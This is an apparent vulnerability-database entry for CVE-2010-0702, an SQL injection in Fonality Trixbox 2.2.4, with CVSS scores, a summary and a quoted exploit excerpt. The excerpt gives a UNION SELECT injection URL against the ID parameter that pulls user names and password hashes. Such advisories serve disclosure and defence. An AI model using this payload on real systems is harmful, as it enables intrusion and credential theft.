7.5
CVSSv2

CVE-2010-0702

Published: 23/02/2010 Updated: 31/01/2023
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote malicious users to execute arbitrary SQL commands via the ID parameter.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

netfortris trixbox 2.2.4

Exploits

# Software Link: trixboxorg/downloads # Version: 224 # Code : server/cisco/services/PhoneDirectoryphp?ID=1 [SQL INJECTION] Example (Grab users / password hashes from sugarcrm) server/cisco/services/PhoneDirectoryphp?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash ...